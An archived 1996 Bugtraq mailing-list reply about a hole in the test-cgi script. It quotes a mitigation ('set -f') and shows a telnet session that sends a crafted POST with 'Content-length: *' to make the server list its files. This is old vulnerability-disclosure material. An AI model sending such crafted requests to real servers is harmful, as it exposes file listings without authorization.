[3804] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Vulnerability in test-cgi

daemon@ATHENA.MIT.EDU (Evgene Ilyine)
Tue Dec 17 12:00:31 1996

Date: 	Tue, 17 Dec 1996 12:24:32 +0300
Reply-To: Evgene Ilyine <esi@ptc.spbu.ru>
From: Evgene Ilyine <esi@ptc.spbu.ru>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To:  <199612040417.WAA07585@cegt201.bradley.edu>

On Tue, 3 Dec 1996, Joe Zbiciak wrote:

> string.  Therefore it's still vulnerable in it's default configuration.
> Adding "set -f" as the second line of the script closes the hole completely.

  Yes -- otherwise this hole would looks like a virus, here is anoter
mutation:

<esi@snark:~> (268) telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
post /cgi-bin/nph-test-cgi http/1.0
Content-type: x
Content-length: *

.. skiped
CONTENT_LENGTH = ( here you'll get a list of files)

=============================================================
postmaster@spbu.ru                              Evgene Ilyine
http://www.ptc.spbu.ru/~esi               Work phone:428-4527
=============================================================


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[3804] in bugtraq

Re: Vulnerability in test-cgi

daemon@ATHENA.MIT.EDU (Evgene Ilyine)Tue Dec 17 12:00:31 1996

daemon@ATHENA.MIT.EDU (Evgene Ilyine)
Tue Dec 17 12:00:31 1996